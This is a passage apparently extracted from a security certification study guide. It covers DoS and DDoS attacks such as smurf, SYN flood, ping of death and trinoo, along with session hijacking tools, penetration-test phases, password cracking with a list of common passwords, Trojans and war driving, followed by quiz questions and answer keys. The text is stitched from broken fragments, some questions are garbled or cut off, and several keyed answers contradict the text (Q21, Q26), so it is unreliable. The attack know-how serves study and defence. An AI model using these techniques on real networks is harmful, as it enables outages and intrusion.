d. It redirects port 80 to port 139 on the target machine.
Answers
1.
Answer: b
2.
Answer: c
3.
Answer: d
4.
Answer: a
5.
Answer: b
6.
Answer: d
7.
Answer: a
8.
Answer: c
9.
Answer: d
10. Answer: b
11. Answer: c
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
16. Answer: a
17. Answer: b
18. Answer: d
19. Answer: a
20. Answer: c
21. Answer: b
22. Answer: a
23. Answer: c
24. Answer: d
25. Answer: c
DOS Attacks
DoS attacks fall into the following general categories:
Consumption of resources such as storage space, bandwidth, and CPU utilization
Protocol attacks
Logic attacks
Consumption of resources attacks use up communication bandwidth to limit network throughput, fill up
storage space, or keep the CPU working at almost full capacity. Protocol attacks exploit design rules
of widely used network protocols such as ICMP, UDP, and TCP and attempt to confuse the target
computer by presenting packets that do not adhere to expected patterns and formats. Logic attacks
take advantage of weaknesses in network-related software.
As a corollary to these major types of DoS attacks, compromise of the physical network components
and disruption of network configuration information can also result in a denial of service.
Some typical DoS attacks are as follows:
Smurf. This attack uses the Internet Control Message Protocol (ICMP) to overwhelm the targets
network with message traffic. To initiate smurf, the attacker spoofs the IP source address of the
ping packet by inserting the address of the target site as the source address. Then, the spoofed
packet is sent to the broadcast address of a very large network. When all the sites on the network
receive the ICMP Echo requests, they respond by sending a message to the source address in
the ping packet. The target network is overwhelmed by all the messages sent simultaneously, so
it is unable to provide service to legitimate messages.
Fraggle. A fraggle attack is similar to a smurf attack but uses UDP echo packets instead of ICMP
echo packets. The attacker sends large numbers of UDP echo messages to IP broadcast
addresses of a very large network. The UDP packets have spoofed source addresses that are
the address of the target machine. The broadcast sites then respond to the echo requests by
flooding the target machine.
SYN flood. To initiate a SYN flood attack, the attacker sends a high volume of synchronization
(SYN) requests to establish a communication connection to the target computer. In this
communication protocol, the target machine responds with an acknowledgment of receiving the
SYN requests by sending back SYN/ACK messages. The target machine maintains a buffer
queue known as a backlog queue for the SYN/ACK messages and waits for the attacker machine
to send an acknowledgment (ACK) message for each of the SYN/ACK responses; however, the
attacker machine does not respond with any ACK messages. The problem is that SYN/ACK
messages are maintained in the queue of the target computer until an ACK is received for each
SYN/ACK message. As a result, the queue becomes saturated and the target computer does not
respond to legitimate communication requests. In addition, the target system might crash.
Chargen. A chargen attack connects ports between two Unix or Linux computers. The two
machines then send high volumes of messages to each other and cause saturation of their
network bandwidths. These computers usually have a chargen port (19) and an echo port (7).
The attacker generates forged UDP packets to connect the chargen port on one machine to the
echo port on the other machine. The chargen port generates repeated sets of ASCII characters
and the echo port retransmits or echoes the transmissions it receives. Therefore, the resulting
high volume of messages between the two computers consumes the available communication
bandwidth and keeps the computers from handling normal communications.
Ping of death. In the ping-of-death attack, the attacker uses an oversized (>65,536 bytes) ICMP
packet. Normally, an IP packet is not permitted to be larger than 65,536 bytes, but IP does permit
a packet to be divided into smaller fragments. If the fragments are of sizes such that when they
are reconstituted they produce a packet larger than 65,536 bytes, the operating system either
freezes or crashes when the packets are reassembled. SSPing is a tool that implements the
ping-of-death type DoS attack.
Ping flood. This attack is effected by using the ping-f command to send a very large number
of ping (ICMP echo) packets to the target computer. To be effective, the hacker must have
greater bandwidth available than the target. If the target responds with ICMP echo reply packets,
both the incoming and outgoing bandwidths available for communication with legitimate sources
are reduced.
Teardrop. The teardrop attack involves sending fragmented packets with offsets such that some
bytes in the fragments overlap when they are reassembled at the target machine. Because the
receiving computer cannot handle overlapping fragments, it usually crashes or freezes.
Land. The land exploit is accomplished by sending a TCP SYN packet with the identical source
and destination port and IP address to a target machine. The target machine becomes confused
by the flawed packet and usually goes into a frozen state where the CPU shows 100-percent
utilization.
Buffer overflow. A buffer overflow results from a programming error that permits writing more
data into a fixed length buffer than the buffer can hold. When this occurs, the data overflow the
buffer and overwrite adjacent memory areas. The additional overflow data might cause the
program to run in an unexpected manner or the system to shut down, or the data might be
executed as malicious code. Proper bounds checking can prevent buffer overflows.
WinNuke. The WinNuke exploit transmits out of band (OOB) data to the IP address of a
Windows computer. The data are sent to port 139, the NetBIOS port, of the target machine. The
software in the target computer usually is not designed to accept OOB data, so the computer
crashes and presents the blue screen.
SMBdie. The server message block (SMB) attack targets Microsoft operating systems by using
the SMB protocol and sending a malformed packet request to port 139 or 445. If the connection
and attack succeed, the buffer of the target computer is flooded and communication on the
network is no longer possible.
Jolt. In a jolt attack, a large ICMP packet is fragmented in a manner such that the target machine
cannot reassemble it. This situation causes the target computer to freeze.
Targa. Targa is a set of programs that can be used to run a number of denial-of-service exploits,
including land, teardrop, WinNuke, and jolt.
Bubonic.c. Bubonic.c sends TCP packets containing random settings designed to consume the
target machines resources to the extent that the target machine crashes.
DDoS Attacks
DDoS attacks make use of compromised intermediate computers to launch many attacks on a target
machine simultaneously. The DDoS attack comprises the following two phases:
1. Mass Intrusion Phase: Master servers conduct computerized searches for and exploration of
potential weaknesses in a large number of computers, known as primary victims, clients, or
daemons, and install DDoS attack software on these primaries.
2. DDOS Attack Phase: Using the daemons, the attacker launches largescale DoS attacks
against the target.
This process is illustrated in Figure 9-1.
Trinoo (TrinOO). Trinoo implements DDoS attacks through synchronized UDP communication
floods. It is initiated by the attacker communicating with the trinoo master to launch a DoS attack
against specified IP addresses. The master, in turn, sends instructions to the clients to attack the
specified IP addresses for a given time duration. The attacker to master server communication is
password protected and is accomplished through master destination port 27665/tcp. The master
to client communication is through destination port 27444/ud and requires the UDP packet to
include the string l44. The trinoo daemon communicates its availability to the server masters
through destination port 31335/udp. Trinoo daemons have been given a variety of names,
including trinix, irix, http, ns, and rpc.trinoo.
TFN. TFN is similar to trinoo in that it provides the capability to launch a DDoS attack with
multiple clients generating UDP flood attacks against a target. In addition, TFN can produce
packets with spoofed IP source addresses and can launch smurf, ICMP echo request flood, and
TCP SYN flood attacks. The TFN master communicates with clients using ICMP echo reply
packets and sends the target IP addresses to the clients.
Stacheldraht. This DDoS tool uses multiple layers to launch attacks against remote hosts. The
communication proceeds from the attacker to client software to handlers to zombie agents (or
demons) to targeted victims. Stacheldraht means barbed wire in German and is directed toward
Linux and Solaris operating systems. It supports attacker to hacker encrypted communications
and can launch smurf, ICMP flood, UDP flood, and ICMP flood attacks.
TFN2K. TFN2K is a DDoS program that uses the client-server (zombie) architecture similar to
TFN to launch flood attacks. It can spoof IP source addresses and operate with TCP, ICMP, and
UDP protocols. It can also send decoy packets to avoid detection as well as cause systems to
crash by sending malformed packets.
Trinity. In trinity, messages from the attacker or handler to the daemon are sent by means of AOL
ICQ or Internet Relay Chat (IRC). It also conducts flooding attacks using SYN, RST, ACK, UDP,
and fragments.
Shaft. A shaft DDOS operates with the client controlling the duration of the attack and the size of
the flood packets, which all have a sequence number of 0x28374839. It functions similar to a
trinoo attack.
Mstream. The purpose of this tool is to enable intruders to utilize multiple Internet connected
systems to launch packet flooding denial of service attacks against one or more target systems.
Similar to trinoo, mstream comprises a handler and daemon, where communication from the
attacker to the handler is password protected.
Find DDoS 2.0. This DDoS malicious software uses malformed packets to crash information
systems.
Security Auditors Research Assistant (SARA). This is a network security analysis tool
based on the Security Administrator Tool for Analyzing Networks (SATAN) model. SARA
performs vulnerability scans and searches for default configuration settings, configuration
errors, and known system vulnerabilities.
DDoSPing. This software conducts remote scans for such DDoS software as tribe flood,
trinoo, and Stacheldraht executing with their default settings.
Remote Intrusion Detection (RID). RID uses intrusion fingerprints to track down
compromised hosts. It is capable of remotely detecting Stacheldraht, TFN, and trinoo if the
attacker did not change the default ports.
BindView Zombie Zapper. This is an open source tool that can disable daemons sending
flood packets in attacks such as TFN, trinoo, and Stacheldraht.
FBI National Infrastructure Protection Center (NIPC) Find DDoS. This software is useful
for checking firewall or network configurations to detect DDoS Trojans.
Ramenfind. Ramenfind detects and removes the Ramen worm, which was modified to
install DDoS agents.
Secure network hosts.
Prohibit ICMP messages from external sources to access the networks broadcast and multicast
addresses.
o
Session Hijacking
Session hijacking occurs when an attacker takes over an existing, authenticated communication that
has been initiated by a valid user. The attacker replaces a valid user on one end of the communication
and continues the message exchange, pretending to be the valid user. Session hijacking is illustrated
in Figure 9-2.
A layered architecture divides communication processes into individual layers with standard
interfaces. These layers are designed to be modular and easier to maintain independently of the other
layers. Also, different protocol standards are used in each layer.
In the layered architecture, data flow downward from the top layer to the bottom layer. The top layer is
nearest to the user applications, and the bottom layer is concerned with transmitting electrical or
optical signals over conductors to the destination of the communication. As the data traverse the
layers, each layer encapsulates the data before sending them to the next layer. At the receiving end,
the data proceed up the layers from the electrical conductor interface to the user application layer,
with the data being unencapsulated or stripped as they move up the layers.
The Internet is based on the Transmission Control Protocol/Internet Protocol (TCP/IP) suite of
protocols, which comprises the following four layers:
Application layer
Host-to-host layer
Internet layer
Network access layer
The TCP/IP layers are shown in Figure 9-4.
FUNCTION
PROTOCOLS
Application
Host-to-host
TCP, UDP
Internet
FUNCTION
PROTOCOLS
Network
access
FDDi, Ethernet,
X.25
Transmission Control Protocol (TCP). TCP provides for the reliable transmission of data and
supports full duplex, connection-oriented communications; it acknowledges packets to sender
after receiving packets; and it sequences packets as they arrive.
User Datagram Protocol (UDP). UDP delivers packets on a best effort basis and is not
concerned with packet sequencing or error free delivery. It is defined as a connectionless
protocol.
IP (Internet Protocol). IP assigns source and data addresses to each packet but provides
unreliable datagram service in that there is no certainty that the packets will be delivered to the
destination or received in the order sent. Routers make their transmission path decisions based
on the IP destination address in each packet.
Address Resolution Protocol (ARP). ARP matches the IP destination address of a data packet
to the MAC (Ethernet) address of the destination computer.
Reverse Address Resolution Protocol (RARP). RARP provides the reverse service of ARP in
that it maps a known MAC address to an IP address.
Internet Control Message Protocol (ICMP). ICMP supports the distribution of packets on the
network, and provides information concerning alternate routing and health of the network. The
ping utility is provided by ICMP and is used to check network paths and the availability of
machines on a network.
Simple Mail Transfer Protocol (SMTP). SMTP is used for transmission and reception of email.
Sequence Numbers
Sequence numbers are important to the conduct of session hijacking. Sequence numbers are
assigned to packets to ensure that they can be reassembled at the receiving end in the correct order
and to check for missing packets. A TCP communication session is set up by a three-way handshake
process as follows:
1. The client (communication initiator) sends a synchronization packet to the server. The
synchronization packet is characterized by the SYN flag being set in the packet. The packet
contains a pseudo-random 32-bit Initial Sequence Number (ISN), N, and Window size number
(WIN). The 32-bit ISN can be one of 4,294,967,295 possible combinations. The Window size
represents the size of the input buffer that both sides of the communication session use to
receive input data.
2. The receiving host acquires the packet and stores the ISN. Then, the receiving host responds
with a packet containing acknowledgment (ACK) and SYN flags and a 32-bit Acknowledgment
Number, which indicates the next sequence that the receiving host is anticipating. In this case,
the expected sequence number is N+1. The receiving computer also sends its own Initial
Sequence Number, Y, to the initiating client.
3. The client replies with a packet with the ACK flag set and containing the next Sequence
Number, N+1, and an Acknowledgement Number of Y+1. The Acknowledgment Number, Y+1,
indicates that the client is expecting a packet from the receiving host with a Sequence Number
of Y+1.
Therefore, for an attacker to hijack a session and replace, for example, the initiating host, he or she
must be able to anticipate the correct Sequence Number to put in his or her packet to make a smooth
transition in replacing the initiating host. This hijacking must be accomplished after the initial session
set up and authentication and before the session ends.
There are two types of session hijacking, active and passive. In an active attack, the attacker
identifies and finds an active session and takes it over. For an attack to be employed against a
session, the initiating client must be using non-encrypted TCP/IP applications such as FTP or Telnet.
A passive attack is accomplished by the attacker hijacking a session but not actively taking it over and
participating in a communication exchange. Instead, the attacker monitors the message traffic and
obtains information from the packet stream. Examples of information obtained are passwords and
user identifications.
If the attacker does not completely control the flow of packets between the parties, some
communication between the legitimate parties may continue. For example, a server might send an
ACK packet to the originating client with a sequence number that the client is not expecting to see. As
a result, the client will send an ACK packet containing the sequence number that it is anticipating back
to the server. Now, the server has received an ACK packet with a sequence number that it is not
expecting and, as a consequence, will retransmit the last ACK packet that it sent. This exchange of
ACK packets will continue at a high rate and result in an ACK Storm that disables the communication
on the network. Therefore, the attacker must act quickly when hijacking a session to prevent an ACK
Storm. An ACK Storm is obviated by an attacker using ARP cache poisoning because this process
prevents the two hosts form communicating directly.
If an ACK Storm does materialize, it can be cleared if the attacker transmits a TCP packet with the
reset (RST) flag set to both parties in the communication session. The reset will terminate the
communication session.
Ettercap. Ettercap performs live connection sniffing, ARP cache poisoning, dissecting of
protocols, and supporting of man-in-the middle attacks. Figure 9-5 shows an Ettercap window
with sniffed live connections and the connection attribute. A connection with an asterisk indicates
that a password was captured.
Hunt. The Hunt software targets Linux systems and conducts session hijacking, including ARP
cache poisoning, sniffing, monitoring connections, resetting TCP connections, and discovering
MAC addresses. Hunt is different from other tools in that it can return a hijacked session to the
original communicating entities and resynchronize the Sequence Number.
TTY Watcher. TTY Watcher is limited to monitoring and controlling users on a single Solaris
machine, rather than on a network. Like Hunt, it has the ability to return a hijacked session to a
user. It operates by allowing the attacker to share a login session with a valid user.
IP Watcher. IP Watcher is a network security and administration tool for Linux systems that
incorporates active countermeasures. It allows an attacker to control a login session and monitor
network communication connections on any TCP port. It can also be used as a tool against
attackers.
Juggernaut. Juggernaut is a network sniffer and monitoring tool for Linux systems. It monitors
network communication sessions and supports an attacker hijacking one or more of the sessions.
P.A.T.H. P.A.T.H. stands for Perl Advanced TCP Hijacking and is a set of tools for monitoring and
hijacking network communication sessions written in Perl. It incorporates a sniffer, a packet
generator for building different types of packets, and ARP cache poisoning.
T-Sight. T-Sight is a commercial tool that supports local session hijacking on Windows systems
and active monitoring of network connections. It performs ARP cache poisoning and also can be
used as a post-mortem network analysis tool. Figure 9-6 shows the main real-time window of TSight. The screen has the following network statistics at the bottom:
Left side: No packets have been dropped (0%).
Next data: 2 packets/second is the network average transmission rate.
Next data: 7 packets traversed the network in the last second.
At the top of the screen, an active session is indicated by the double arrow.
Assessment Questions
You can find the answers to the following questions in Appendix A.
1.
What type of information system attack has the objective of consuming the resources of an
information system to the point that it cannot perform its normal functions for legitimate
users?
a. Denial of service
b. Social engineering
c. Session hijacking
d. Masquerading
2.
What type of attack originates from a large number of computers infected with bot
software?
a. Social engineering
4.
5.
6.
7.
Which DoS attack uses the Internet Control Message Protocol (ICMP) to overwhelm the
victims network with message traffic? (To initiate the attack, the attacker spoofs the IP
source address of the ping packet by inserting the address of the victim site as the source
address.)
a. SYN flood
b. Smurf
c. Fraggle
d. Chargen
8.
Which DoS attack connects ports between two Unix or Linux computers through which
they send high volumes of messages to each other and cause saturation of their network
bandwidths?
a. Chargen
b. SYN flood
c. Fraggle
d. Smurf
9.
Which DoS attack sends large numbers of UDP echo messages with spoofed source
addresses to IP broadcast addresses of a very large network?
a. SYN flood
b. Smurf
c. Fraggle
d. Chargen
10. Which DoS attack uses an oversized (>65,536 bytes) ICMP packet to create a situation
where the operating system of the target machine either freezes or crashes?
a. Teardrop
b. Ping flood
c. Fraggle
d. Ping of death
11. Which DoS exploit is accomplished by sending a TCP SYN packet with the identical
source and destination port and IP address to a target machine?
a. Teardrop
b. Land
c. Ping flood
d. Fraggle
12. Which DoS attack results from a programming error that permits writing more data into a
fixed length buffer than the buffer can hold?
a. Jolt
b. WinNuke
c. Teardrop
d. Buffer overflow
13. Which DoS exploit transmits Out of Band (OOB) data to the IP address of a Windows
computer?
a. WinNuke
b. Targa
c. Jolt
d. SMBdie
14. Which DoS tool is a set of programs that can be used to run a number of denial service
exploits, including land, teardrop, WinNuke, and jolt?
a. SMBdie
b. Targa
c. Bubonic.c
d. Ping flood
15. Which attack comprises a Mass Intrusion Phase and Attack Phase?
a. Dictionary
b. Replay
c. DDoS
d. Back door
16. Groups of infected clients used in a DDoS attack are called which one of the following?
a. Data points
b. Botnets
c. DoSnets
d. Seconds
17. Which DDoS attack tool implements synchronized UDP communication floods?
a. Find DDoS
b. Trinity
c. Stacheldraht
d. Trinoo
18. Which DDoS attack tool uses multiple layers to launch attacks against Linux and Solaris
remote hosts, where the communication proceeds from the attacker to client software to
handlers to zombie agents (demons) to targeted victims?
a. Stacheldraht
b. Trinity
c. TFN
d. Shaft
19. In which DDoS attack are messages from the attacker or handler to the daemon sent by
means of AOL ICQ or Internet Relay Chat (IRC)?
a. Trinoo
b. Trinity
c. TFN2K
d. Shaft
20. Which one of the following actions is Bubonic.c a measure that is taken to reduce the
chances of a successful DoS attack?
a. Apply router filtering.
b. Conduct backups of information and configuration data.
c. Delay installation of appropriate software patches.
d. Disable unneeded network services.
21. Which one of the following actions is Bubonic.c a measure that is taken to reduce the
chances of a successful DDoS attack?
a. Permit ICMP messages from external sources to access a networks broadcast and
multicast addresses.
b. Apply stateful inspection firewalls to verify valid TCP connections.
c. Install intrusion detection systems (IDSs).
d. Use zombie scanning software.
22. NetProwler, Snort, Network Flight Recorder, and Dragon are examples of what type of
tool?
a. Virus scanner
b. Intrusion prevention system
c. Patch management
d. Intrusion detection system
23. What type of tools are DDoSPing, Security Auditors Research Assistant (SARA), and
dds?
a. Zombie scanning software
b. Cookie scanning software
c. Penetration software
d. Router scanning software
24. What attack occurs when an attacker takes over an existing, authenticated communication
that has been initiated by a valid user and replaces the valid user on one end of the
communication?
a. Denial of Service
b. Session hijacking
c. Distributed denial of Service
d. Spoofing
25. What attack involves an attacker pretending to be the valid user and making his or her
own connection to a network server?
a. Session hijacking
b. Distributed denial of Service
c. Spoofing
d. Social engineering
26. What structure is used to divide communication processes into individual layers with
standard interfaces?
a. Virtual architecture
b. Boolean minimization
c. Stepwise reduction
d. Layered architecture
27. What is a set of rules that define how entities communicate with each other over
telecommunication networks?
a. Communication constraints
b. Structured programming
c. Protocol
d. Layered architecture
28. Which one of the following is not a layer in the TCP/IP protocol?
a. Host-to-host layer
b. Session layer
c. Internet layer
d. Network access layer
29. Which layer of TCP/IP provides end-to-end data delivery service and error free packet
delivery?
a. Application layer
b. Session layer
c. Host-to-host layer
d. Internet layer
30. IP, ARP, and ICMP are protocol standards in which TCP/IP layer?
a. Internet layer
b. Application layer
c. Network access layer
d. Session layer
31. For an attacker to hijack a session and replace an initiating host, he or she must be able to
predict what item?
a. Session number
b. Sequence Number
c. Modem number
d. Network number
32. What are the two types of session hijacking?
a. Active and brute force
b. Replay and passive
c. Active and passive
d. Detective and preventive
33. Which one of the following actions is not a step in hijacking an authenticated connection?
a. Request a third-party connection from one of the users.
b. Find and track an active session.
c. Take one of the parties offline.
d. Inject the attackers packet.
34. What action is occurring when an attackers computer sends a spoofed reply to the ARP
request providing its MAC address as being assigned to the IP address of another
computer?
a. Local session hijacking
b. Blind session hijacking
c. Cache poisoning
d. MAC attack
35. Which one of the following is not a tool for session hijacking?
a. Ettercap
b. T-Sight
c. Juggernaut
d. Local
36. Which one of the following is not a method for protecting against session hijacking?
a. Permitting remote access
b. Encryption
c. Strong authentication
d. Restricting traffic into the network
Answers
1.
Answer: a
2.
Answer: b
3.
Answer: c
4.
Answer: b
5.
Answer: a
6.
Answer: d
7.
Answer: b
8.
Answer: a
9.
Answer: c
10. Answer: d
11. Answer: b
12. Answer: d
13. Answer: a
14. Answer: b
15. Answer: c
The correct answer is c. Answer a, dictionary attack, uses a dictionary of common passwords to
gain network access. Answer b, replay, occurs when an attacker intercepts and saves old
messages to send later. Answer d, back door, is an attack that takes place using dial-up modems
or asynchronous external connections.
16. Answer: b
17. Answer: d
18. Answer: a
19. Answer: b
20. Answer: c
21. Answer: a
22. Answer: d
23. Answer: a
24. Answer: b
25. Answer: c
26. Answer: c
27. Answer: c
28. Answer: b
29. Answer: c
30. Answer: a
31. Answer: b
32. Answer: c
33. Answer: a
34. Answer: c
35. Answer: d
36. Answer: a
Level II, Network evaluation. More hands-on than a Level I assessment, a Level II assessment
has some of the Level I activities with more information gathering and scanning.
Level III, Penetration test. A penetration test is not usually concerned with policies. Its more
about taking the adversarial view of a hacker, by seeing what can be accomplished and with what
difficulty.
The reason a security professional may wish to conduct a penetration test of his or her company is
the same as the reason a business has a security policy: to leverage due diligence and due care data
protection for the preservation of the companys capital investment.
Several factors have converged in the marketplace to make penetration testing a necessity. The
evolution of information technology has focused on ease of use at the operational end, while
exponentially increasing the complexity of the computer. Unfortunately, the administration and
management requirements of these systems have increased because:
The skill level required to execute a hacker exploit has steadily decreased.
The size and complexity of the network environment has mushroomed.
The number of network and Web-based applications has increased.
The detrimental impact of a security breach on corporate assets and goodwill is greater than
ever.
Penetration testing is most commonly carried out within a black-box (that is, with no prior knowledge
of the infrastructure to be tested). At its simplest level, the penetration test involves three phases:
1. Preparation phase. A formal contract is executed containing nondisclosure of the clients data
and legal protection for the tester. At a minimum, it also lists the IP addresses to be tested and
the time to test.
2. Execution phase. The penetration test is executed, with the tester looking for potential
vulnerabilities.
3. Delivery phase. The results of the evaluation are communicated to the testers contact in the
organization, and corrective action is advised.
Footprinting
Footprinting is the blueprinting of the security profile of an organization. It involves gathering
information about your targets network to create a profile of the organizations networks and systems.
Its an important way for an attacker to gain information about an organization passively (that is,
without the organizations knowledge).
Footprinting employs the first two steps of reconnaissance: gathering the initial target information and
determining the network range of the target. Common tools and resources used in the footprinting
phase are:
Whois
SmartWhois
Nslookup
Sam Spade
Footprinting may also require manual research, such as studying the companys Web page for useful
information. For example:
Company contact names, phone numbers, and email addresses
Company locations and branches
Other companies with which the target company partners or deals
News, such as mergers or acquisitions
Links to other company-related sites
Company privacy policies, which may help identify the types of security mechanisms in place
Other resources that may have information about the target company are:
The SECs EDGAR database if the company is publicly traded
Job boards, either internal to the company or external sites
Disgruntled employee blogs and Web sites
Trade press
Footprinting also involved social-engineering techniques that will be reviewed later in this chapter.
Scanning
The next four steps of gathering information (identifying active machines, discovering open ports and
access points, fingerprinting the operating system, and uncovering services on ports) are considered
part of the scanning phase. Your goal here is to discover open ports and applications by performing
external or internal network scanning, pinging machines, determining network ranges, and scanning
the ports of individual systems.
Although youre still in the mode of gathering information, scanning is more active than footprinting,
and here youll begin to get a more detailed picture of your target.
Some common tools used in the scanning phase are:
NMap
Ping
Traceroute
SuperScan
Netcat
NeoTrace
Visual Route
Enumerating
The last step mentioned, mapping the network, is the result of the scanning phase and leads us to the
enumerating phase. As the final pretest phase, the goal of enumeration is to paint a fairly complete
picture of the target.
To enumerate a target, a tester tries to identify valid user accounts or poorly-protected resource
shares using directed queries and active connections to and from the target.
The type of information sought by testers during the enumeration phase can be names of users and
groups, network resources and shares, and applications.
The techniques used for enumerating include:
Obtaining Active Directory information and identifying vulnerable user accounts
Discovering the NetBIOS name with Nbtscan
Using SNMPutil for SNMP
Employing Windows DNS queries
Establishing null sessions and connections
Remember that during a penetration test, you should document every step and discovery for later
exploitation.
VisualRoute. VisualRoute by VisualWare includes integrated traceroute, ping tests, and reverse
DNS and Whois lookups. It also displays the actual route of connections and IP address locations
on a global map.
SmartWhois. Like Whois, SmartWhois by TamoSoft obtains comprehensive info about the
target: IP address, host name or domain, including country, state or province, city, name of the
network provider, administrator and technical support, and contact information. Unlike Whois
utilities, SmartWhois can find the information about a computer located in any part of the world,
intelligently querying the right database and delivering all the related records within a few
seconds.
Sam Spade. Sam Spade, a freeware tool primarily used to track down spammers, can also be
used to provide information about a target. It comes with a host of useful network tools, including
ping, Nslookup, Whois, IP block Whois, dig, traceroute, finger, SMTP, VRFY, Web browser, keepalive, DNS zone transfer, SMTP relay check, and more.
Port Scanners
Port scanning is one of the most common reconnaissance techniques used by testers to discover the
vulnerabilities in the services listening to well-known ports. Once youve identified the IP address of a
target through footprinting, you can begin the process of port scanning: looking for holes in the system
through which you, or a malicious intruder, can gain access. A typical system has 2^16 -1 port
numbers, each with its own TCP and UDP port that can be used to gain access if unprotected.
Nmap, the most popular port scanner for Linux, is also available for Windows. Nmap can scan a
system in a variety of stealth modes, depending upon how undetectable you want to be. Nmap can
determine a lot of information about a target, such as what hosts are available, what services are
offered, and what OS is running.
Other port-scanning tools for Linux systems include SATAN, NSAT, VeteScan, SARA, PortScanner,
Network Superscanner, CGI Port Scanner, and CGI Sonar.
Vulnerability Scanners
Nessus, a popular open-source tool, is an extremely powerful network scanner that can be configured
to run a variety of scans. While a Windows graphical front-end is available, the core Nessus product
requires Linux to run.
Microsofts Baseline Security Analyzer is a free Windows vulnerability scanner. MBSA can be used to
detect security configuration errors on local computers or on computers across a network, and it is
now in its second release. It does have some issues with Windows Update, however, and cant
always tell if a patch has been installed.
Popular commercial vulnerability scanners include Retina Network Security Scanner, which runs on
Windows, and SAINT, which runs on various Unix/ Linux versions.
Password Crackers
Password cracking doesnt have to involve fancy tools, but its a fairly tedious process. If the target
doesnt lock you out after a specific number of tries, you can spend an infinite amount of time trying
every combination of alphanumeric characters. Its just a question of time and bandwidth before you
break into the system.
The most common passwords found are password, root, administrator, admin, operator, demo, test,
webmaster, backup, guest, trial, member, private, beta, [company_name] or [known_username].
Three basic types of password-cracking tests can be automated with tools:
Dictionary. A file of words is run against user accounts; if the password is a simple word, it can
be found pretty quickly.
Hybrid. A hybrid attack works like a dictionary attack but adds simple numbers or symbols to the
file of words. This attack exploits a weakness of many passwords: They are common words with
numbers or symbols tacked to the ends.
Brute force. The most time-consuming but comprehensive way to crack a password. Every
combination of character is tried until the password is broken.
Brutus. Brutus is a password-cracking tool that can perform both dictionary attacks and brute
force attacks where passwords are randomly generated from a given character. It can crack the
multiple authentication types, HTTP (Basic authentication, HTML Form/CGI), POP3, FTP, SMB,
and Telnet.
WebCracker. WebCracker is a simple tool that takes text lists of usernames and passwords and
uses them as dictionaries to implement basic password guessing.
ObiWan. ObiWan is a password-cracking tool that can work through a proxy. It uses wordlists
and alternates numeric or alphanumeric characters with Roman characters to generate possible
passwords.
Trojan Horses
A Trojan is a program that performs unknown and unwanted functions. It could take one or more of
the following forms:
An unauthorized program contained within a legitimate program
A legitimate program that has been altered by the placement of unauthorized code within it
Any program that appears to perform a desirable and necessary function but does something
unintended
Trojans can be transmitted to the computer in several ways: through email attachments, freeware,
physical installation, ICQ/IRC chat, phony programs, or infected websites. When the user signs on
and goes online, the Trojan is activated, and the attacker gains access to the system.
Unlike a worm, a Trojan doesnt typically self-replicate. The exact type of attack depends on the type
of Trojan.
Trojans can be:
Remote access Trojans
Keystroke loggers or password-sending Trojans
Software detection killers
Purely destructive or denial-of-service Trojans
The list of Trojan horses in the wild is expanding quickly, but a few of the earliest have remained
relevant since the beginning, and many of these serve as platforms for the development of more lethal
variations.
Back Orifice 2000 (BO2K) is the granddaddy of Trojan horses and has spawned a considerable
number of imitators. Once installed on a target PC or server machine, BO2K gives the attacker
complete control of the victim.
BO2K has stealth capabilities, will not show up on the task list, and runs completely in hidden mode.
Back Orifice and its variants have been credited with the highest number of infestations of Windows
systems.
Another Trojan that has been around for a considerable time is SubSeven, although it is becoming
less and less of a problem. SubSeven is a backdoor program that enables others to gain full access to
Windows systems through the network.
Other common Trojans and spyware currently in the wild include Rovbin, Canary, Remacc.RCPro,
NetCat, Jgidol, IRC.mimic, and NetBus.
Buffer Overflows
A buffer overflow (or overrun) occurs when a program allocates a specific block length of memory for
something but then attempts to store more data than the block was intended to hold. This overflowing
data can overwrite memory areas and interfere with information crucial to the normal execution of the
program. While buffer overflows may be a side effect of poorly written or buggy code, they can also be
triggered intentionally in order to create an attack.
A buffer overflow can allow an intruder to load a remote shell or execute a command, allowing the
attacker to gain unauthorized access or escalate user privileges. To generate the overflow, the
attacker must create a specific data feed to induce the error, as random data will rarely produce the
desired effect.
For a buffer overflow attack to work, the target system must fail to test the data or stack boundaries
and must also be able to execute code that resides in the data or stack segment. Once the stack is
smashed, the attacker can deploy his or her payload and take control of the attacked system.
Three common ways to test for a buffer overflow vulnerability are as follows:
Look for strings declared as local variables in functions or methods, and verify the presence of
boundary checks in the source code.
Check for improper use of input/output or string functions.
Feed the application large amounts of data and check for abnormal behavior.
Products such as Immunixs Stackguard and ProPolice employ stack-smashing protection to detect
buffer overflows on stack-allocated variables. Also, vulnerability scanners such as Proventia can help
protect against buffer overflow.
Buffer overflow vulnerabilities can be detected by manual auditing of the code as well as by boundary
testing. Other countermeasures include updating C and C++ software compilers and C libraries to
more secure versions and disabling stack execution in the program.
War driving is a term used to describe the process of a hacker who, armed with a laptop and a
wireless adapter card and traveling by car, bus, subway train, or other form of mechanized transport,
goes around sniffing for WLANs.
War walking refers to the same process, commonly in public areas like malls, hotels, or city streets,
but using shoe leather instead of the transportation methods listed earlier.
The concept of war driving is simple: Using a device capable of receiving an 802.11b signal, a device
capable of locating itself on a map, and software that will log data from the moment that a network
signal is detected, the hacker moves from place to place, letting these devices do their jobs. Over
time, the hacker builds up a database containing the network name, signal strength, location, and
IP/namespace in use for all of the discovered wireless hotspots.
With SNMP, the hacker may even log packet samples and probe the access points for available data.
The hacker may also mark the locations of the vulnerable wireless networks with chalk on the
sidewalk or building itself. This is called war chalking and alerts other intruders that an exposed
WLAN is nearby.
Common war-driving exploits find many wireless networks with WEP disabled and using only the
SSID for access control. The SSID for wireless networks can be found quickly. This vulnerability
makes these networks susceptible to whats called the parking lot attack, where, at a safe distance
from the buildings perimeter, an attacker gains access to the target network.
WLAN Vulnerabilities
Wireless LANs are susceptible to the same protocol-based attacks that plague wired LAN but also
have their own set of unique vulnerabilities. Since wireless access points may proliferate in the
organization, unsecured wireless access points can be a danger to organizations because they offer
the attacker a route around the companys firewall and into the network.
SSID Issues
The service set identifier (SSID) is an identification value programmed in the access point or group of
access points to identify the local wireless subnet. This segmentation of the wireless network into
multiple networks is a form of an authentication check; the SSID acts as a simple password, providing
a measure of security. When a client computer is connected to the access point, the network tries to
confirm the SSID with the computer. If the wireless station does not know the value of the SSID,
access is denied to the associated access point.
The wireless access point is configured to broadcast its SSID. When enabled, any client without an
SSID is able to receive it and have access to the access point. Users are also able to configure their
own client systems with the appropriate SSID because they are widely known and easily shared.
Many access points use default SSIDs provided by the manufacturers, and a list of those default
SSIDs is available for download on the Internet. This means that its very easy for a hacker to
determine an access points SSID and gain access to it via software tools.
Also, a non-secure access WLAN mode exists, which allows clients to connect to the access point
